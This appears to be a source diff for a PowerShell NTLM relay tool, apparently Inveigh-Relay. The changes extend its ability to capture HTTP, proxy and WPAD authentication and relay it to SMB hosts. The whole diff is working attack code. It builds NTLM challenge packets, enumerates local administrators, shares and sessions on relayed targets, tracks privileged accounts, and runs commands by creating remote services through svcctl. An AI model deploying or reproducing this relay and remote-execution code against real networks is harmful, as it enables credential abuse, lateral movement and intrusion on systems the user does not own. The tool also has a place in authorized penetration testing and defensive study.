+ # get list of systems with custom shares
+ if(!$targets -and !$target)
+ {
+ $targets = $inveigh.enumeration_data | Where-Object {$_."Shares"} | Select-Object -expand IP
+
+ if($targets)
+ {
+ $SMB_target_results = Test-SMBTarget $targets $SessionLimitShare
+ $SMB_client = $SMB_target_results[0]
+ $target = $SMB_target_results[1]
+ }
+
+ }
+
+ # get random target
+ if(!$target -and $TargetMode -eq 'Random')
+ {
+ $SMB_target_results = Test-SMBTarget $inveigh.target_list $SessionLimitUnpriv
+ $SMB_client = $SMB_target_results[0]
+ $target = $SMB_target_results[1]
+ }
+
+ if($target -and !$inveigh.relay_history_table.$SourceIP)
+ {
+ $inveigh.relay_history_table.Add($SourceIP,[Array]$target)
+ }
+ elseif($target -and $inveigh.relay_history_table.$SourceIP -notcontains $target)
+ {
+ $inveigh.relay_history_table.$SourceIP += $target
}
}
@@ -2360,7 +2651,7 @@ $SMB_relay_functions_scriptblock =
{
$error_message = $_.Exception.Message
$error_message = $error_message -replace "`n",""
- $inveigh.output_queue.Add("[-] $error_message") > $null
+ $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] $error_message") > $null
}
return $SMB_client,$target
@@ -2439,13 +2730,12 @@ $SMB_relay_functions_scriptblock =
if($HTTP_NTLM_domain_string -ne '')
{
- #$inveigh.relay_user_failed_list.Add("$HTTP_source_IP $HTTP_username_full $Target") > $null
- if(!$inveigh.relay_failed_auth_table.$HTTP_username_full)
+ if(!$inveigh.relay_failed_auth_table.ContainsKey($HTTP_username_full))
{
$inveigh.relay_failed_auth_table.Add($HTTP_username_full,[Array]$target)
}
- elseif($inveigh.relay_failed_auth_table.$HTTP_username_full -notcontains $target)
+ else
{
$inveigh.relay_failed_auth_table.$HTTP_username_full += $target
}
@@ -2462,7 +2752,7 @@ $SMB_relay_functions_scriptblock =
{
$error_message = $_.Exception.Message
$error_message = $error_message -replace "`n",""
- $inveigh.output_queue.Add("[-] $error_message") > $null
+ $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] $error_message") > $null
$SMB_relay_failed = $true
}
@@ -2554,7 +2844,6 @@ $SMB_relay_functions_scriptblock =
'CreateRequest'
{
$tree_ID = $SMB_client_receive[40..43]
- #$tree_ID = 0x01,0x00,0x00,0x00
$SMB_named_pipe_bytes = 0x73,0x00,0x76,0x00,0x63,0x00,0x63,0x00,0x74,0x00,0x6c,0x00 # \svcctl
$message_ID++
$packet_SMB2_header = New-PacketSMB2Header 0x05,0x00 0x01,0x00 $false $message_ID $SMB_process_ID $tree_ID $session_ID
@@ -2662,22 +2951,23 @@ $SMB_relay_functions_scriptblock =
$packet_SCM_data = New-PacketSCMCreateServiceW $SMB_service_manager_context_handle $SMB_service_bytes $SMB_service_length $SMBExec_command_bytes $SMBExec_command_length_bytes
$SCM_data = ConvertFrom-PacketOrderedDictionary $packet_SCM_data
$inveigh.output_queue.Add("[!] [$(Get-Date -format s)] $HTTP_username_full has command execution privilege on $target") > $null
- $administrator_list = $inveigh.enumeration_list | Where-Object {$_.IP -eq $target} | ForEach-Object {$_."Administrator Users"}
- if($administrator_list -notcontains $HTTP_username_full)
+ if($inveigh.domain_mapping_table.ContainsKey($HTTP_NTLM_domain_string))
{
- $administrator_list += $HTTP_username_full
- $target_index = $inveigh.enumeration_list | Where-Object {$_.IP -eq $target} | Select-Object -expand Index
- $inveigh.enumeration_list[$target_index].Sessions = $administrator_list
+ $privileged_user = ($HTTP_NTLM_user_string + "@" + $inveigh.domain_mapping_table.$HTTP_NTLM_domain_string).ToUpper()
}
-
- if(!$inveigh.relay_privilege_table.$HTTP_username_full) # check
+ else
{
- $inveigh.relay_privilege_table.Add($HTTP_username_full,[Array]$target)
+ $privileged_user = $HTTP_username_full
}
- elseif($inveigh.relay_privilege_table.$HTTP_username_full -notcontains $target)
+
+ $target_index = $inveigh.enumeration_data | Where-Object {$_.IP -eq $target} | Select-Object -expand Index
+ [Array]$privileged_user_list = $inveigh.enumeration_data[$target_index].Privileged
+
+ if($privileged_user_list -notcontains $privileged_user)
{
- $inveigh.relay_privilege_table.$HTTP_username_full += $target
+ $privileged_user_list += $privileged_user
+ $inveigh.enumeration_data[$target_index].Privileged = $privileged_user_list
}
if($AccessCheck)
@@ -2698,11 +2988,6 @@ $SMB_relay_functions_scriptblock =
}
elseif([System.BitConverter]::ToString($SMB_client_receive[128..131]) -eq '05-00-00-00')
{
-
- if($HTTP_NTLM_domain_string -ne '')
- {
- #$inveigh.relay_user_failed_list.Add("$HTTP_source_IP $HTTP_username_full $Target") > $null
- }
if($Attack -notcontains 'Session')
{
@@ -2963,7 +3248,7 @@ $SMB_relay_functions_scriptblock =
$SMB_client_stream.Flush()
$SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null
- if($Attack -contains 'Session')
+ if($Attack -contains 'Session' -or $Attack -contains 'Execute')
{
$inveigh.session_message_ID_table[$inveigh.session_count] = $message_ID
$stage = 'Exit'
@@ -3004,22 +3289,11 @@ $SMB_relay_functions_scriptblock =
{
$error_message = $_.Exception.Message
$error_message = $error_message -replace "`n",""
- $inveigh.output_queue.Add("[-] $error_message") > $null
+ $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] $error_message") > $null
$stage = 'Exit'
}
}
-
- if(!$SMB_relay_failed -and $RelayAutoDisable -eq 'Y' -and $inveigh.target_list.Count -eq 1 -and $Attack -notcontains 'Session')
- {
- #$inveigh.target_list.Remove($Target)
- $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] Relay auto disabled due to success") > $null
- $inveigh.SMB_relay = $false
- }
- elseif(!$SMB_relay_failed -and $Attack -notcontains 'Session')
- {
- #$inveigh.target_list.Remove($Target)
- }
if($Attack -contains 'Session')
{
@@ -3034,7 +3308,7 @@ $SMB_relay_functions_scriptblock =
function SMBRelayEnum
{
- param ($SMB_client,$SMB_version,$SMB_user_ID,$session_ID,$process_ID)
+ param ($SMB_client,$SMB_user_ID,$session_ID,$process_ID,$Enumerate,$EnumerateGroup)
function Get-StatusPending
{
@@ -3050,10 +3324,10 @@ $SMB_relay_functions_scriptblock =
$client_receive = New-Object System.Byte[] 81920
$SMB_signing = $false
- $message_ID = $inveigh.session_message_ID_table[$inveigh.session_current]
- $action = "All"
+ $message_ID = $inveigh.session_message_ID_table[$inveigh.session_count]
+ $action = $Enumerate
$tree_ID = 0x00,0x00,0x00,0x00
- $group = "Administrators"
+ $group = $EnumerateGroup
if($Action -eq 'All')
{
@@ -3201,7 +3475,9 @@ $SMB_relay_functions_scriptblock =
}
catch
{
- Write-Output "[-] Session connection is closed"
+ $error_message = $_.Exception.Message
+ $error_message = $error_message -replace "`n",""
+ $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] $error_message") > $null
$stage = 'Exit'
}
@@ -3648,7 +3924,6 @@ $SMB_relay_functions_scriptblock =
$response_user_start = $response_user_count * 8 + 164
$response_user_end = $response_user_start
$response_user_length_start = 152
- #$response_user_list = @()
$i = 0
while($i -lt $response_user_count)
@@ -3674,13 +3949,10 @@ $SMB_relay_functions_scriptblock =
$response_user = $response_user -replace "-00",""
$response_user = $response_user.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
$response_user = New-Object System.String ($response_user,0,$response_user.Length)
- #Add-Member -InputObject $response_user_object -MemberType NoteProperty -Name Username $response_user
$response_user_length_start = $response_user_length_start + 8
- #$response_user_list += $response_user_object
$i++
}
- #Write-Output $response_user_list | Sort-Object -property Username |Format-Table -AutoSize
$stage = 'CloseRequest'
}
@@ -3728,12 +4000,11 @@ $SMB_relay_functions_scriptblock =
$response_user_start = $response_user_count * 16 + $response_domain_start + 12
$response_user_end = $response_user_start
$response_user_length_start = $response_domain_start + 4
- $response_user_list = @()
+ #$response_user_list = @()
$i = 0
while($i -lt $response_user_count)
{
- #$response_user_object = New-Object PSObject
[Byte[]]$response_user_type_bytes = $client_receive[($response_user_length_start - 4)]
[Byte[]]$response_user_length_bytes = $client_receive[$response_user_length_start..($response_user_length_start + 1)]
$response_user_length = [System.BitConverter]::ToInt16($response_user_length_bytes,0)
@@ -3758,8 +4029,6 @@ $SMB_relay_functions_scriptblock =
$response_user = $response_user -replace "-00",""
$response_user = $response_user.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
$response_user = New-Object System.String ($response_user,0,$response_user.Length)
- #Add-Member -InputObject $response_user_object -MemberType NoteProperty -Name Username $response_user
- #Add-Member -InputObject $response_user_object -MemberType NoteProperty -Name Domain $response_domain_list[$response_SID_index]
$response_user_length_start = $response_user_length_start + 16
$response_administrator = $response_domain_list[$response_SID_index] + "\" + $response_user
@@ -3895,7 +4164,7 @@ $SMB_relay_functions_scriptblock =
$inveigh.output_queue.Add($enumerate_share_list -join ",") > $null
}
- if($enumerate_netsession_list -gt 0 -and $action_stage -eq 'NetSession')
+ if($enumerate_netsession_list.Count -gt 0 -and $action_stage -eq 'NetSession')
{
$inveigh.output_queue.Add("[+] [$(Get-Date -format s)] $target NetSessions:") > $null
$inveigh.output_queue.Add($enumerate_netsession_list -join ",") > $null
@@ -4595,7 +4864,6 @@ $SMB_relay_functions_scriptblock =
}
elseif($action_stage -eq 'Share' -and $share_list.Count -gt 0 -and $j -eq $share_list.Count - 1)
{
- #Write-Output $response_object_list | Sort-Object -property Share |Format-Table -AutoSize
$tree_ID = $tree_IPC
$stage = 'TreeDisconnect'
$j++
@@ -4660,7 +4928,9 @@ $SMB_relay_functions_scriptblock =
}
catch
{
- $inveigh.output_queue.Add("[-] Session connection is closed")
+ $error_message = $_.Exception.Message
+ $error_message = $error_message -replace "`n",""
+ $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] $error_message") > $null
$stage = 'Exit'
}
@@ -4700,19 +4970,99 @@ $SMB_relay_functions_scriptblock =
{
$error_message = $_.Exception.Message
$error_message = $error_message -replace "`n",""
- $inveigh.output_queue.Add("[-] $error_message") > $null
+ $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] $error_message") > $null
$stage -ne 'Exit'
}
}
- $target_index = $inveigh.enumeration_list | Where-Object {$_.IP -eq $target} | Select-Object -expand Index
- $inveigh.enumeration_list[$target_index]."Administrator Users" = $enumerate_group_user_list
- $inveigh.enumeration_list[$target_index]."Administrator Groups" = $enumerate_group_group_list
- $inveigh.enumeration_list[$target_index]."Local Users" = $enumerate_user_list
- $inveigh.enumeration_list[$target_index].Shares = $enumerate_share_list
- $inveigh.enumeration_list[$target_index].NetSessions = $enumerate_netsession_list
- $inveigh.session_message_ID_table[$inveigh.session_current] = $message_ID
+ For($i = 0;$i -lt $enumerate_group_user_list.Count;$i++)
+ {
+ $user_entry = $enumerate_group_user_list[$i]
+ $user_entry_split = $user_entry.Split("\")
+ $domain = $user_entry_split[0]
+ $username = $user_entry_split[1]
+
+ if($inveigh.domain_mapping_table.ContainsKey($domain))
+ {
+ $user_update = ($username + "@" + $inveigh.domain_mapping_table.$domain).ToUpper()
+ $enumerate_group_user_list[$i] = $user_update
+ }
+
+ }
+
+ For($i = 0;$i -lt $enumerate_group_group_list.Count;$i++)
+ {
+ $group_entry = $enumerate_group_group_list[$i]
+ $group_entry_split = $group_entry.Split("\")
+ $domain = $group_entry_split[0]
+ $group = $group_entry_split[1]
+
+ if($inveigh.domain_mapping_table.ContainsKey($domain))
+ {
+ $group_update = ($group + "@" + $inveigh.domain_mapping_table.$domain).ToUpper()
+ $enumerate_group_group_list[$i] = $group_update
+ }
+
+ }
+
+ $inveigh.session_message_ID_table[$inveigh.session_count] = $message_ID
+ $target_index = $inveigh.enumeration_data | Where-Object {$_.IP -eq $target} | Select-Object -expand Index
+ $inveigh.enumeration_data[$target_index]."Administrator Users" = $enumerate_group_user_list
+ $inveigh.enumeration_data[$target_index]."Administrator Groups" = $enumerate_group_group_list
+ $inveigh.enumeration_data[$target_index]."Local Users" = $enumerate_user_list
+ $inveigh.enumeration_data[$target_index].Shares = $enumerate_share_list
+ $net_sessions_unique = @()
+
+ ForEach($net_session_entry in $enumerate_netsession_list)
+ {
+
+ if($inveigh.enumeration_data[$target_index].NetSessions -notcontains $net_session_entry)
+ {
+ $net_sessions_unique += $net_session_entry
+ }
+
+ $net_session_IP = ($net_session_entry.Split("\"))[2]
+ $net_session_user = ($net_session_entry.Split("\"))[3]
+
+ if($inveigh.enumeration_data | Where-Object {$_.IP -eq $net_session_IP})
+ {
+ $net_session_index = $inveigh.enumeration_data | Where-Object {$_.IP -eq $net_session_IP} | Select-Object -expand Index
+
+ if($net_session_index -and $inveigh.enumeration_data[$net_session_index].NetSessions -notcontains $net_session_user)
+ {
+ $inveigh.enumeration_data[$net_session_index].NetSessionsMapped += $net_session_user
+ }
+
+ }
+ else
+ {
+ if(!($inveigh.enumeration_data | Where-Object {$_.IP -eq $net_session_IP}))
+ {
+
+ try
+ {
+ $mapped_hostname = [System.Net.Dns]::GetHostEntry($net_session_IP).HostName
+ }
+ catch
+ {
+ $inveigh.output_queue.Add("[-] [$(Get-Date -format s)] DNS reverse lookup for $net_session_IP failed") > $null
+ }
+
+ }
+
+ $inveigh.enumeration_data += New-RelayEnumObject -IP $net_session_IP -Hostname $mapped_hostname -NetSessionsMapped $net_session_user
+ }
+
+ }
+
+ $inveigh.enumeration_data[$target_index].NetSessions += $net_sessions_unique
+
+ if(!$RPC_access_denied)
+ {
+ $inveigh.enumeration_data[$target_index].Enumerate = $(Get-Date -format s)
+ }
+
}
}
@@ -4720,9 +5070,10 @@ $SMB_relay_functions_scriptblock =
# HTTP/HTTPS/Proxy Server ScriptBlock
$HTTP_scriptblock =
{
- param ($Attack,$Challenge,$Command,$HTTPIP,$HTTPPort,$HTTPResetDelay,$HTTPResetDelayTimeout,$HTTPS_listener,
- $Proxy,$ProxyIgnore,$proxy_listener,$RelayAutoDisable,$Service,$SMB_version,$SessionLimitPriv,$SessionLimitUnpriv,
- $SessionLimitShare,$SessionPriority,$Target,$Username,$WPADAuth,$WPADAuthIgnore,$WPADResponse)
+ param ($Attack,$Challenge,$Command,$Enumerate,$EnumerateGroup,$FailedAuthLimit,$HTTPIP,$HTTPPort,$HTTPResetDelay,
+ $HTTPResetDelayTimeout,$HTTPS_listener,$Proxy,$ProxyIgnore,$proxy_listener,$RelayAutoDisable,$RepeatEnumerate,
+ $RepeatExecute,$Service,$SMB_version,$SessionLimitPriv,$SessionLimitUnpriv,$SessionLimitShare,
+ $SessionPriority,$Target,$TargetMode,$TargetRefresh,$Username,$WPADAuth,$WPADAuthIgnore,$WPADResponse)
function NTLMChallengeBase64
{
@@ -4747,25 +5098,51 @@ $HTTP_scriptblock =
}
$inveigh.HTTP_challenge_queue.Add($ClientIPAddress + $ClientPort + ',' + $HTTP_challenge) > $null
-
- $HTTP_NTLM_bytes = 0x4e,0x54,0x4c,0x4d,0x53,0x53,0x50,0x00,0x02,0x00,0x00,0x00,0x06,0x00,0x06,0x00,0x38,
- 0x00,0x00,0x00,0x05,0x82,0x89,0xa2 +
+ $hostname_bytes = [System.Text.Encoding]::Unicode.GetBytes($inveigh.computer_name)
+ $netBIOS_domain_bytes = [System.Text.Encoding]::Unicode.GetBytes($inveigh.netBIOS_domain)
+ $DNS_domain_bytes = [System.Text.Encoding]::Unicode.GetBytes($inveigh.DNS_domain)
+ $DNS_hostname_bytes = [System.Text.Encoding]::Unicode.GetBytes($inveigh.DNS_computer_name)
+ $hostname_length = [System.BitConverter]::GetBytes($hostname_bytes.Length)[0,1]
+ $netBIOS_domain_length = [System.BitConverter]::GetBytes($netBIOS_domain_bytes.Length)[0,1]
+ $DNS_domain_length = [System.BitConverter]::GetBytes($DNS_domain_bytes.Length)[0,1]
+ $DNS_hostname_length = [System.BitConverter]::GetBytes($DNS_hostname_bytes.Length)[0,1]
+ $target_length = [System.BitConverter]::GetBytes($hostname_bytes.Length + $netBIOS_domain_bytes.Length + $DNS_domain_bytes.Length + $DNS_domain_bytes.Length + $DNS_hostname_bytes.Length + 36)[0,1]
+ $target_offset = [System.BitConverter]::GetBytes($netBIOS_domain_bytes.Length + 56)
+
+ $HTTP_NTLM_bytes = 0x4e,0x54,0x4c,0x4d,0x53,0x53,0x50,0x00,0x02,0x00,0x00,0x00 +
+ $netBIOS_domain_length +
+ $netBIOS_domain_length +
+ 0x38,0x00,0x00,0x00 +
+ 0x05,0x82,0x89,0xa2 +
$HTTP_challenge_bytes +
- 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x82,0x00,0x82,0x00,0x3e,0x00,0x00,0x00,0x06,
- 0x01,0xb1,0x1d,0x00,0x00,0x00,0x0f,0x4c,0x00,0x41,0x00,0x42,0x00,0x02,0x00,0x06,0x00,
- 0x4c,0x00,0x41,0x00,0x42,0x00,0x01,0x00,0x10,0x00,0x48,0x00,0x4f,0x00,0x53,0x00,0x54,
- 0x00,0x4e,0x00,0x41,0x00,0x4d,0x00,0x45,0x00,0x04,0x00,0x12,0x00,0x6c,0x00,0x61,0x00,
- 0x62,0x00,0x2e,0x00,0x6c,0x00,0x6f,0x00,0x63,0x00,0x61,0x00,0x6c,0x00,0x03,0x00,0x24,
- 0x00,0x68,0x00,0x6f,0x00,0x73,0x00,0x74,0x00,0x6e,0x00,0x61,0x00,0x6d,0x00,0x65,0x00,
- 0x2e,0x00,0x6c,0x00,0x61,0x00,0x62,0x00,0x2e,0x00,0x6c,0x00,0x6f,0x00,0x63,0x00,0x61,
- 0x00,0x6c,0x00,0x05,0x00,0x12,0x00,0x6c,0x00,0x61,0x00,0x62,0x00,0x2e,0x00,0x6c,0x00,
- 0x6f,0x00,0x63,0x00,0x61,0x00,0x6c,0x00,0x07,0x00,0x08,0x00 +
+ 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 +
+ $target_length +
+ $target_length +
+ $target_offset +
+ 0x06,0x01,0xb1,0x1d,0x00,0x00,0x00,0x0f +
+ $netBIOS_domain_bytes +
+ 0x02,0x00 +
+ $netBIOS_domain_length +
+ $netBIOS_domain_bytes +
+ 0x01,0x00 +
+ $hostname_length +
+ $hostname_bytes +
+ 0x04,0x00 +
+ $DNS_domain_length +
+ $DNS_domain_bytes +
+ 0x03,0x00 +
+ $DNS_hostname_length +
+ $DNS_hostname_bytes +
+ 0x05,0x00 +
+ $DNS_domain_length +
+ $DNS_domain_bytes +
+ 0x07,0x00,0x08,0x00 +
$HTTP_timestamp +
0x00,0x00,0x00,0x00,0x0a,0x0a
$NTLM_challenge_base64 = [System.Convert]::ToBase64String($HTTP_NTLM_bytes)
$NTLM = 'NTLM ' + $NTLM_challenge_base64
- $NTLM_challenge = $HTTP_challenge
+ #$NTLM_challenge = $HTTP_challenge
return $NTLM
}
@@ -4798,7 +5175,6 @@ $HTTP_scriptblock =
$HTTP_client_close = $true
$process_ID_bytes = Get-ProcessIDArray
$relay_step = 0
- $inveigh.HTTP_listener = $HTTP_listener # debug remove
if($proxy_listener)
{
@@ -5190,23 +5566,80 @@ $HTTP_scriptblock =
}
- if($inveigh.enumeration_list | Where-Object {$_.IP -eq $HTTP_source_IP})
+ if($inveigh.domain_mapping_table.ContainsKey($HTTP_NTLM_domain_string))
+ {
+ $session = ($HTTP_NTLM_user_string + "@" + $inveigh.domain_mapping_table.$HTTP_NTLM_domain_string).ToUpper()
+ $hostname = ($HTTP_NTLM_host_string + "." + $inveigh.domain_mapping_table.$HTTP_NTLM_domain_string).ToUpper()
+ }
+ else
+ {
+ $session = $HTTP_username_full
+ }
+
+ if($inveigh.enumeration_data | Where-Object {$_.Hostname -eq $hostname})
{
- $session_list = $inveigh.enumeration_list | Where-Object {$_.IP -eq $HTTP_source_IP} | ForEach-Object {$_.Sessions}
+ $target_index = $inveigh.enumeration_data | Where-Object {$_.Hostname -eq $hostname} | Select-Object -expand Index
+ $session_list = @($inveigh.enumeration_data[$target_index].Sessions)
+
+ if($inveigh.domain_mapping_table.ContainsKey($HTTP_NTLM_domain_string))
+ {
+
+ For($i = 0;$i -lt $session_list.Count;$i++)
+ {
+ $session_username = ($session_list[$i].Split("\"))[1]
+ $session_update = $session_username + "@" + $inveigh.domain_mapping_table.$HTTP_NTLM_domain_string
+
+ if($session_list[$i] -like "$HTTP_NTLM_domain_string\*")
+ {
+ $session_list[$i] = $session_update
+ $inveigh.enumeration_data[$target_index].Sessions = $session_list
+ }
+
+ }
+
+ }
- if($session_list -notcontains $HTTP_username_full)
+ if($session_list -notcontains $session)
{
- $session_list += $HTTP_username_full
- $target_index = $inveigh.enumeration_list | Where-Object {$_.IP -eq $HTTP_source_IP} | Select-Object -expand Index
- $inveigh.enumeration_list[$target_index].Sessions = $session_list
+ $session_list += $session
+ $inveigh.enumeration_data[$target_index].Sessions = $session_list
+ }
+
+ }
+ elseif($inveigh.enumeration_data | Where-Object {$_.IP -eq $HTTP_source_IP})
+ {
+ $target_index = $inveigh.enumeration_data | Where-Object {$_.IP -eq $HTTP_source_IP} | Select-Object -expand Index
+ $inveigh.enumeration_data[$target_index].Hostname = $hostname
+ $session_list = @($inveigh.enumeration_data[$target_index].Sessions)
+
+ if($inveigh.domain_mapping_table.ContainsKey($HTTP_NTLM_domain_string))
+ {
+
+ For($i = 0;$i -lt $session_list.Count;$i++)
+ {
+ $session_username = ($session_list[$i].Split("\"))[1]
+ $session_update = $session_username + "@" + $inveigh.domain_mapping_table.$HTTP_NTLM_domain_string
+
+ if($session_entry -like "$HTTP_NTLM_domain_string\*")
+ {
+ $session_list[$i] = $session_update
+ $inveigh.enumeration_data[$target_index].Sessions = $session_list
+ }
+
+ }
+
+ }
+
+ if($session_list -notcontains $session)
+ {
+ $session_list += $session
+ $inveigh.enumeration_data[$target_index].Sessions = $session_list
}
}
else
{
- $session_list = New-Object System.Collections.ArrayList
- $session_list.Add($HTTP_username_full) > $null
- $inveigh.enumeration_list += New-RelayEnumObject -IP $HTTP_source_IP -Sessions $session_list -Targeted $false
+ $inveigh.enumeration_data += New-RelayEnumObject -IP $HTTP_source_IP -Hostname $hostname -Session $session
}
$HTTP_response_status_code = 0x32,0x30,0x30
@@ -5217,77 +5650,131 @@ $HTTP_scriptblock =
if($inveigh.SMB_relay -and $relay_step -eq 2)
{
- if(!$Username -or $Username -contains $HTTP_NTLM_user_string -or $Username -contains "$HTTP_username_full")
+ if(!$Username -or $Username -contains $HTTP_NTLM_user_string -or $Username -contains $HTTP_username_full)
{
if($inveigh.machine_accounts -or (!$inveigh.machine_accounts -and -not $HTTP_NTLM_user_string.EndsWith('$')))
{
- if($inveigh.relay_user_failed_list -notcontains "$HTTP_source_IP $HTTP_username_full $Target")
+ if($inveigh.relay_failed_auth_table.$HTTP_username_full.Count -le $FailedAuthLimit)
{
$inveigh.output_queue.Add("[!] [$(Get-Date -format s)] Sending $NTLM_type response for $HTTP_username_full for relay to $Target") > $null
$SMB_relay_failed = SMBRelayResponse $SMB_client $HTTP_request_bytes $SMB_version $SMB_user_ID $session_ID $process_ID_bytes
if(!$SMB_relay_failed)
{
+ $inveigh.session_current = $inveigh.session_count
+ $inveigh.session_message_ID_table.Add($inveigh.session_count,3)
if($Attack -contains 'Session')
{
- $inveigh.session_socket_table[$inveigh.session_count] = $SMB_client
- $inveigh.session_table[$inveigh.session_count] = $session_ID
- $inveigh.session_message_ID_table[$inveigh.session_count] = 3
- $inveigh.session_lock_table[$inveigh.session_count] = 'open'
- $session_privilege = SMBRelayExecute $SMB_client $SMB_version $SMB_user_ID $session_ID $process_ID_bytes $true
- $session_object = New-Object PSObject
- Add-Member -InputObject $session_object -MemberType NoteProperty -Name Session $inveigh.session_count
- Add-Member -InputObject $session_object -MemberType NoteProperty -Name Target $SMB_client.Client.RemoteEndpoint.Address.IPaddressToString
- Add-Member -InputObject $session_object -MemberType NoteProperty -Name Initiator $HTTP_source_IP
- Add-Member -InputObject $session_object -MemberType NoteProperty -Name User $HTTP_username_full
-
- if($session_privilege)
- {
- Add-Member -InputObject $session_object -MemberType NoteProperty -Name Privileged "yes"
- }
- else
- {
- Add-Member -InputObject $session_object -MemberType NoteProperty -Name Privileged "no"
- }
if($SMB_client.Connected)
{
- $status = "connected"
- }
- else
- {
- $status = "disconnected"
+ $inveigh.session_socket_table[$inveigh.session_count] = $SMB_client
+ $inveigh.session_table[$inveigh.session_count] = $session_ID
+ $inveigh.session_lock_table[$inveigh.session_count] = 'open'
+ $session_privilege = SMBRelayExecute $SMB_client $SMB_version $SMB_user_ID $session_ID $process_ID_bytes $true
+ $session_object = New-Object PSObject
+ Add-Member -InputObject $session_object -MemberType NoteProperty -Name Session $inveigh.session_count
+ Add-Member -InputObject $session_object -MemberType NoteProperty -Name Target $SMB_client.Client.RemoteEndpoint.Address.IPaddressToString
+ Add-Member -InputObject $session_object -MemberType NoteProperty -Name Initiator $HTTP_source_IP
+ Add-Member -InputObject $session_object -MemberType NoteProperty -Name User $HTTP_username_full
+
+ if($session_privilege)
+ {
+ Add-Member -InputObject $session_object -MemberType NoteProperty -Name Privileged "yes"
+ }
+ else
+ {
+ Add-Member -InputObject $session_object -MemberType NoteProperty -Name Privileged "no"
+ }
+
+ if($SMB_client.Connected)
+ {
+ $status = "connected"
+ Add-Member -InputObject $session_object -MemberType NoteProperty -Name Status $status
+ Add-Member -InputObject $session_object -MemberType NoteProperty -Name "Established" $(Get-Date -format s)
+ Add-Member -InputObject $session_object -MemberType NoteProperty -Name "Last Activity" $(Get-Date -format s)
+ $inveigh.session_list += $session_object
+ $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] Session $($inveigh.session_count) added to session list") > $null
+ }
+
}
- Add-Member -InputObject $session_object -MemberType NoteProperty -Name Status $status
- Add-Member -InputObject $session_object -MemberType NoteProperty -Name "Established" $(Get-Date -format s)
- Add-Member -InputObject $session_object -MemberType NoteProperty -Name "Last Activity" $(Get-Date -format s)
- $inveigh.session_list += $session_object
- $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] Session $($inveigh.session_count) added to session list") > $null
- $inveigh.session_current = $inveigh.session_count
}
- if($attack -contains 'Enumerate')
+ if($Attack -contains 'Enumerate' -or $Attack -contains 'Execute')
{
- SMBRelayEnum $SMB_client $SMB_version $SMB_user_ID $session_ID $process_ID_bytes
+ $target_index = $inveigh.enumeration_data | Where-Object {$_.IP -eq $target} | Select-Object -expand Index
+ $filter_date = Get-Date
}
- if($Attack -contains 'Execute')
+ if(($attack -contains 'Enumerate' -and $SMB_client.Connected) -and
+ (!$inveigh.enumeration_data[$target_index].Enumerate -or
+ (New-TimeSpan $inveigh.enumeration_data[$target_index].Enumerate $filter_date).Minutes -gt $RepeatEnumerate))
+ {
+ SMBRelayEnum $SMB_client $SMB_user_ID $session_ID $process_ID_bytes $Enumerate $EnumerateGroup
+ }
+
+ if((($session_privilege -and $Attack -contains 'Execute' -and $Attack -contains 'Session' -and $SMB_client.Connected) -or
+ ($Attack -contains 'Execute' -and $Attack -notcontains 'Session' -and $SMB_client.Connected)) -and
+ (!$inveigh.enumeration_data[$target_index].Execute -or (New-TimeSpan $inveigh.enumeration_data[$target_index].Execute $filter_date).Minutes -gt $RepeatExecute))
{
SMBRelayExecute $SMB_client $SMB_version $SMB_user_ID $session_ID $process_ID_bytes $false
+ $inveigh.enumeration_data[$target_index].Execute = $(Get-Date -format s)
+ }
+
+ if(!$SMB_client.Connected)
+ {
+ $inveigh.session_list[$inveigh.session_count] | Where-Object {$_.Status = "disconnected"}
}
$inveigh.session_count++
}
+ if($Attack -notcontains 'Session' -and !$SMB_relay_failed -and $RelayAutoDisable -eq 'Y')
+ {
+
+ if($Attack -contains 'Enumerate')
+ {
+
+ $targets_enumerate_complete = $inveigh.enumeration_data | Where-Object {$_.Enumerate} | Select-Object -expand IP
+
+ if($inveigh.target_list -and $targets_enumerated)
+ {
+ $targets_enumerate_remaining = Compare-Object -ReferenceObject $inveigh.target_list -DifferenceObject $targets_enumerate_complete -PassThru | Where-Object {$_.SideIndicator -eq "<="}
+ }
+
+ }
+
+ if($Attack -contains 'Execute')
+ {
+
+ $targets_execute_complete = $inveigh.enumeration_data | Where-Object {$_.Execute} | Select-Object -expand IP
+
+ if($inveigh.target_list -and $targets_enumerated)
+ {
+ $targets_enumerate_remaining = Compare-Object -ReferenceObject $inveigh.target_list -DifferenceObject $targets_execute_complete -PassThru | Where-Object {$_.SideIndicator -eq "<="}
+ }
+
+ }
+
+ if((!$targets_enumerate_remaining -and $Attack -contains 'Enumerate' -and $Attack -notcontains 'Execute') -or
+ (!$targets_execute_remaining -and $Attack -contains 'Execute' -and $Attack -notcontains 'Enumerate') -or
+ (!$targets_enumerate_remaining -and !$targets_execute_remaining -and $Attack -contains 'Enumerate' -and $Attack -contains 'Execute'))
+ {
+ $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] Relay auto disabled due to success") > $null
+ $inveigh.SMB_relay = $false
+ }
+
+ }
+
$relay_step = 0
}
else
{
- $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] Relay aborted since $HTTP_username_full has already been tried on $Target") > $null
+ $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] Relay aborted since $HTTP_username_full has exceeded failed login limit") > $null
$SMB_client.Close()
$relay_step = 0
}
@@ -5408,7 +5895,7 @@ $HTTP_scriptblock =
}
$HTTP_client.Close()
- start-sleep -s 5
+ start-sleep -s 1
$HTTP_listener.Server.blocking = $false
Start-Sleep -s 1
$HTTP_listener.Server.Close()
@@ -5419,36 +5906,7 @@ $HTTP_scriptblock =
# Control Relay Loop ScriptBlock
$control_relay_scriptblock =
{
- param ($ConsoleQueueLimit,$RelayAutoExit,$RunTime,$SigningCheck)
-
- function SigningCheck
- {
- $process_ID_bytes = Get-ProcessIDArray
- $target_list = $inveigh.target_list
-
- ForEach($target_entry in $target_list)
- {
- $SMB_client = New-Object System.Net.Sockets.TCPClient
